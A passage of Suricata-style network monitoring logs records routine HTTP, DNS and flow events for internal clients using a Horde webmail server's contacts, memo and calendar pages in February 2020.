Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/turba\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5092}} {"timestamp":"2020-02-29T00:14:53.002720+0000","flow_id":280640340632148,"event_type":"flow","src_ip":"192.168.10.122","src_port":52733,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:09:52.533076+0000","end":"2020-02-29T00:09:52.641396+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:14:54.541786+0000","flow_id":30355435553035,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52758,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/mnemo\/list.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5677},"app_proto":"http","fileinfo":{"filename":"\/mnemo\/list.php","state":"CLOSED","stored":false,"size":29738,"tx_id":2}} {"timestamp":"2020-02-29T00:14:55.960466+0000","flow_id":1847126602345263,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34836,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/turba\/browse.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/turba\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5092},"app_proto":"http","fileinfo":{"filename":"\/turba\/browse.php","state":"CLOSED","stored":false,"size":27259,"tx_id":0}} {"timestamp":"2020-02-29T00:14:55.970053+0000","flow_id":1364947804081477,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":35285,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":37041,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:14:56.074979+0000","flow_id":1364947804081477,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":35285,"proto":"UDP","dns":{"type":"answer","id":37041,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:14:56.074979+0000","flow_id":1364947804081477,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":35285,"proto":"UDP","dns":{"type":"answer","id":37041,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:14:56.602528+0000","flow_id":1847126602345263,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34836,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/turba\/contact.php?source=P7pxaJ1DBxG_43W0bvFVAZB&key=5vmPLSQuRAd-p6FI4ND2V1R","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/turba\/browse.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":20683}} {"timestamp":"2020-02-29T00:14:57.000627+0000","event_type":"stats","stats":{"uptime":14549,"capture":{"kernel_packets":135801,"kernel_drops":0},"decoder":{"pkts":135801,"bytes":93472586,"invalid":188,"ipv4":134294,"ipv6":8,"ethernet":135801,"raw":0,"null":0,"sll":0,"tcp":128948,"udp":5143,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":688,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7098784},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2784,"ssn_memcap_drop":0,"pseudo":347,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2800,"synack":2791,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":143,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1823,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":103,"dcerpc_udp":0,"dns_udp":2351,"failed_udp":112},"tx":{"http":4682,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2431}},"flow_mgr":{"closed_pruned":2765,"new_pruned":15,"est_pruned":2391,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":24132,"memcap_state":0,"memcap_global":0},"http":{"memuse":155319,"memcap":0}}} {"timestamp":"2020-02-29T00:15:01.606087+0000","flow_id":1847126602345263,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34836,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/turba\/contact.php?source=P7pxaJ1DBxG_43W0bvFVAZB&key=5vmPLSQuRAd-p6FI4ND2V1R","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/turba\/browse.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":20683},"app_proto":"http","fileinfo":{"filename":"\/turba\/contact.php","state":"TRUNCATED","stored":false,"size":106496,"tx_id":1}} {"timestamp":"2020-02-29T00:15:04.000225+0000","flow_id":218925971392270,"event_type":"flow","src_ip":"192.168.10.81","src_port":52754,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":15,"pkts_toclient":16,"bytes_toserver":1974,"bytes_toclient":15190,"start":"2020-02-29T00:13:53.116494+0000","end":"2020-02-29T00:14:02.767022+0000","age":9,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:15:04.000274+0000","event_type":"stats","stats":{"uptime":14556,"capture":{"kernel_packets":135832,"kernel_drops":0},"decoder":{"pkts":135834,"bytes":93495893,"invalid":188,"ipv4":134327,"ipv6":8,"ethernet":135834,"raw":0,"null":0,"sll":0,"tcp":128980,"udp":5144,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":688,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7098784},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2784,"ssn_memcap_drop":0,"pseudo":347,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2800,"synack":2791,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":143,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1823,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":103,"dcerpc_udp":0,"dns_udp":2351,"failed_udp":112},"tx":{"http":4682,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2431}},"flow_mgr":{"closed_pruned":2765,"new_pruned":15,"est_pruned":2391,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":24132,"memcap_state":0,"memcap_global":0},"http":{"memuse":2119,"memcap":0}}} {"timestamp":"2020-02-29T00:15:06.000144+0000","flow_id":1338237383344368,"event_type":"flow","src_ip":"192.168.10.122","src_port":52542,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:10:04.262384+0000","end":"2020-02-29T00:10:04.370921+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:15:08.716126+0000","flow_id":347324023631198,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":49690,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":9874,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:15:08.826187+0000","flow_id":347324023631198,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":49690,"proto":"UDP","dns":{"type":"answer","id":9874,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:15:08.826187+0000","flow_id":347324023631198,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":49690,"proto":"UDP","dns":{"type":"answer","id":9874,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:15:08.909028+0000","flow_id":422730764433898,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34838,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/turba\/delete.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/turba\/contact.php?source=P7pxaJ1DBxG_43W0bvFVAZB&key=5vmPLSQuRAd-p6FI4ND2V1R","http_method":"POST","protocol":"HTTP\/1.1","status":302,"redirect":"http:\/\/mail.spiral.com\/turba\/search.php","length":20}} {"timestamp":"2020-02-29T00:15:08.909028+0000","flow_id":422730764433898,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.130","src_port":34838,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/turba\/delete.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/turba\/contact.php?source=P7pxaJ1DBxG_43W0bvFVAZB&key=5vmPLSQuRAd-p6FI4ND2V1R","http_method":"POST","protocol":"HTTP\/1.1","status":302,"redirect":"http:\/\/mail.spiral.com\/turba\/search.php","length":20},"app_proto":"http","fileinfo":{"filename":"\/turba\/delete.php","state":"CLOSED","stored":false,"size":77,"tx_id":0}} {"timestamp":"2020-02-29T00:15:08.930159+0000","flow_id":376680125051247,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":34528,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":40775,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:15:09.000182+0000","flow_id":23809887247118,"event_type":"flow","src_ip":"192.168.10.122","src_port":58586,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:10:07.203534+0000","end":"2020-02-29T00:10:07.311742+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:15:09.000397+0000","flow_id":691737431344368,"event_type":"flow","src_ip":"192.168.10.122","src_port":45470,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:10:07.034032+0000","end":"2020-02-29T00:10:07.142311+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:15:09.038527+0000","flow_id":376680125051247,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":34528,"proto":"UDP","dns":{"type":"answer","id":40775,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:15:09.038527+0000","flow_id":376680125051247,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":34528,"proto":"UDP","dns":{"type":"answer","id":40775,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:15:09.109992+0000","flow_id":422730764433898,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34838,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/turba\/search.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/turba\/contact.php?source=P7pxaJ1DBxG_43W0bvFVAZB&key=5vmPLSQuRAd-p6FI4ND2V1R","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":4067}} {"timestamp":"2020-02-29T00:15:09.186121+0000","flow_id":1067809082562313,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":34810,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":37474,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:15:09.294351+0000","flow_id":1067809082562313,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":34810,"proto":"UDP","dns":{"type":"answer","id":37474,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:15:09.294351+0000","flow_id":1067809082562313,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":34810,"proto":"UDP","dns":{"type":"answer","id":37474,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:15:09.486294+0000","flow_id":2078036930179823,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34840,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/nag\/list.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6990}} {"timestamp":"2020-02-29T00:15:12.000160+0000","event_type":"stats","stats":{"uptime":14564,"capture":{"kernel_packets":135848,"kernel_drops":0},"decoder":{"pkts":135873,"bytes":93512839,"invalid":188,"ipv4":134366,"ipv6":8,"ethernet":135873,"raw":0,"null":0,"sll":0,"tcp":129013,"udp":5150,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":688,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7099072},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2786,"ssn_memcap_drop":0,"pseudo":348,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2802,"synack":2793,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":143,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1825,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":103,"dcerpc_udp":0,"dns_udp":2354,"failed_udp":112},"tx":{"http":4685,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2434}},"flow_mgr":{"closed_pruned":2766,"new_pruned":15,"est_pruned":2394,"bypassed_pruned":0,"flows_checked":4,"flows_notimeout":4,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65532,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":24132,"memcap_state":0,"memcap_global":0},"http":{"memuse":139580,"memcap":0}}} {"timestamp":"2020-02-29T00:15:12.002010+0000","flow_id":756720302109332,"event_type":"flow","src_ip":"192.168.10.130","src_port":34826,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":10,"pkts_toclient":10,"bytes_toserver":1153,"bytes_toclient":7795,"start":"2020-02-29T00:14:05.864916+0000","end":"2020-02-29T00:14:11.316494+0000","age":6,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:15:12.596564+0000","flow_id":2078036930179823,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34840,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/nag\/list.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6990},"app_proto":"http","fileinfo":{"filename":"\/services\/portal\/","state":"CLOSED","stored":false,"size":37033,"tx_id":0}} {"timestamp":"2020-02-29T00:15:12.611502+0000","flow_id":148136325567662,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":45317,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":54842,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:15:12.719590+0000","flow_id":148136325567662,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":45317,"proto":"UDP","dns":{"type":"answer","id":54842,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:15:12.719590+0000","flow_id":148136325567662,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":45317,"proto":"UDP","dns":{"type":"answer","id":54842,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:15:13.267260+0000","flow_id":2078036930179823,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34840,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/kronolith\/","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":24340}} {"timestamp":"2020-02-29T00:15:13.410859+0000","flow_id":2078036930179823,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34840,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/kronolith\/","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":24340},"app_proto":"http","fileinfo":{"filename":"\/kronolith\/","state":"TRUNCATED","stored":false,"size":106496,"tx_id":1}} {"timestamp":"2020-02-29T00:15:13.425463+0000","flow_id":1624213506063863,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":43745,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":56364,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:15:13.533751+0000","flow_id":1624213506063863,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":43745,"proto":"UDP","dns":{"type":"answer","id":56364,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:15:13.533751+0000","flow_id":1624213506063863,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":43745,"proto":"UDP","dns":{"type":"answer","id":56364,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:15:13.589999+0000","flow_id":2078036930179823,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34840,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listCalendars","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":639}} {"timestamp":"2020-02-29T00:15:13.589999+0000","flow_id":2078036930179823,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.130","src_port":34840,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listCalendars","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":639},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listCalendars","state":"CLOSED","stored":false,"size":29,"tx_id":2}} {"timestamp":"2020-02-29T00:15:13.612765+0000","flow_id":2078036930179823,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34840,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listCalendars","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":639},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listCalendars","state":"CLOSED","stored":false,"size":1656,"tx_id":2}} {"timestamp":"2020-02-29T00:15:13.624275+0000","flow_id":104855940204179,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":50670,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":51156,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:15:13.729610+0000","flow_id":104855940204179,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":50670,"proto":"UDP","dns":{"type":"answer","id":51156,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:15:13.729610+0000","flow_id":104855940204179,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":50670,"proto":"UDP","dns":{"type":"answer","id":51156,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:15:13.763662+0000","flow_id":978800180569870,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":50520,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":17701,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:15:13.872716+0000","flow_id":978800180569870,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":50520,"proto":"UDP","dns":{"type":"answer","id":17701,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:15:13.872716+0000","flow_id":978800180569870,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":50520,"proto":"UDP","dns":{"type":"answer","id":17701,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:15:13.900021+0000","flow_id":862814588722720,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34842,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listEvents","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":126}} {"timestamp":"2020-02-29T00:15:13.900021+0000","flow_id":862814588722720,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.130","src_port":34842,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listEvents","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":126},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listEvents","state":"CLOSED","stored":false,"size":137,"tx_id":0}} {"timestamp":"2020-02-29T00:15:13.939863+0000","flow_id":2078036930179823,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34840,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":3,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listEvents","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 